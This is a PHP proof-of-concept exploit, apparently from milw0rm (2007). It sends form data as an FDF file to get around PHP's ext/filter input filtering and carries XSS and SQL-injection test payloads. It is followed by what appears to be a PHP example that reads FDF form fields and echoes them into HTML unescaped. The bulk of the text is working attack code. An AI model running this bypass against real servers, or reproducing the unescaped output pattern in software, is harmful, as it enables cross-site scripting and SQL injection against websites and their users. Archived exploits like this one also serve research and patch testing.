// PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf"); unlink("outtest.fdf"); $params = array('http' => array('method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf')); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open {$url}"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?> # milw0rm.com [2007-03-10]
<?php // Open fdf from input string provided by the extension // The pdf form contained several input text fields with the names // volume, date, comment, publisher, preparer, and two checkboxes // show_publisher and show_preparer. $fdf = fdf_open_string($HTTP_FDF_DATA); $volume = fdf_get_value($fdf, "volume"); echo "The volume field has the value '<b>{$volume}</b>'<br />"; $date = fdf_get_value($fdf, "date"); echo "The date field has the value '<b>{$date}</b>'<br />"; $comment = fdf_get_value($fdf, "comment"); echo "The comment field has the value '<b>{$comment}</b>'<br />"; if (fdf_get_value($fdf, "show_publisher") == "On") { $publisher = fdf_get_value($fdf, "publisher"); echo "The publisher field has the value '<b>{$publisher}</b>'<br />"; } else { echo "Publisher shall not be shown.<br />"; } if (fdf_get_value($fdf, "show_preparer") == "On") { $preparer = fdf_get_value($fdf, "preparer"); echo "The preparer field has the value '<b>{$preparer}</b>'<br />"; } else { echo "Preparer shall not be shown.<br />"; } fdf_close($fdf);